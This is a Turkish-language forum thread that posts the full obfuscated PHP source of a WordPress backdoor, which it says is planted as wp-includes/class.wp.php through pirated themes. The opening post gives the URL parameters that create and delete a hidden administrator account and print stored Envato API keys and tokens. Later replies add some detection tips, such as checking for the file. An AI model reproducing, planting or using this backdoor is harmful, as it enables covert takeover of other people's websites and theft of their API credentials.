Wordpress Admin Backdoor
-
Wordpress sitelere warez temalar kullanarak backdoor açma kodu
wp-includes/class.wp.php?awu=ok diye çalıştırınca admin açar
wp-includes/class.wp.php?dwu=ok diye çalışıtırınca Açılan Admini Siler
<?php $ { "GLOBALS" } ["qwftmjw"] = "options"; $ { "GLOBALS" } ["kludsgcibl"] = "table_name"; $ { "GLOBALS" } ["yijgunelcxk"] = "sample"; error_reporting(0); require $_SERVER["DOCUMENT_ROOT"] . "/wp-load.php"; $ { $ { "GLOBALS" } ["kludsgcibl"] } = $wpdb->get_blog_prefix(); $ { $ { "GLOBALS" } ["yijgunelcxk"] } = "a:1:{s:13:\"administrator\";b:1;}"; if (isset($_GET["ok"])) { echo "<!-- Silence is golden. -->"; } if (isset($_GET["awu"])) { $wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('1001010', '1001010', '\$P\$B3PJXeorEqVMl//L3H5xFX1Uc0t5870', '1001010', 't@e.st', '', '2011-06-07 00:00:00', '', '0', '1001010');"); $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (1001010, '1001010', '{$table_name}capabilities', '{$sample}');"); $wpdb->query("INSERT INTO $wpdb->usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '1001010', '{$table_name}user_level', '10');"); } if (isset($_GET["dwu"])) { $wpdb->query("DELETE FROM $wpdb->users WHERE `ID` = 1001010"); $wpdb->query("DELETE FROM $wpdb->usermeta WHERE $wpdb->usermeta.`umeta_id` = 1001010"); } if (isset($_GET["key"])) { $gvgdrowuag = "options"; $ { "GLOBALS" } ["iunegpgs"] = "options"; $ { $gvgdrowuag } = get_option(EWPT_PLUGIN_SLUG); echo "<center><h2>" . esc_attr($ { $ { "GLOBALS" } ["iunegpgs"] } ["user_name"] . ":" . esc_attr($ { $ { "GLOBALS" } ["qwftmjw"] } ["api_key"])) . "<br>"; echo esc_html(envato_market()->get_option("token")); echo "</center></h2>"; } ?>
-
:) yapma bunu neden public ettin ki şimdi :D skdjhksjf şaka bi yana ellerine sağlık.
-
millet uyanık olsun :)
wp-includes/class.wp.php Böyle bir dosya varsa sitenize adam kafasına göre yazı yayınlaya bilir bilginiz olsun
-
Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez
-
KaptaN bunu yazdı
Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez
Böyle bir yazı çıkar dizindede wp-includes/class.wp.php dosya varsa geçmiş olsun
wp-includes/class.wp.php?awu=true derseniz adminsiniz direk
EcHoLL tarafından 12/Ara/17 15:21 tarihinde düzenlenmiştir -
KaptaN bunu yazdı
Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez
fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya.
-
İyimiş hoşmuş, arşivde bulunsun.
-
bunu kaldırabileceğimiz bir eklenti vs. var mıdır
-
Edit : hocam class.wp.php değil de class-wp.php var bunlar aynı şeyler mi?
huzi123 tarafından 12/Ara/17 16:16 tarihinde düzenlenmiştir -
end bunu yazdıKaptaN bunu yazdı
Hocam peki yüklediğini nasıl anlıyosunuz onlarca kişi kurdu temayı ama kim hamgş siteye kurdu nerden bilcez
fonksiyonların içinde bir yerde logluyordur site adresini uzak sunucuya.
Uzak sunucuya göndermiyor.
-
huzi123 bunu yazdı
Edit : hocam class.wp.php değil de class-wp.php var bunlar aynı şeyler mi?
warez tema kullanıyorsanız olması yüksek ihtimal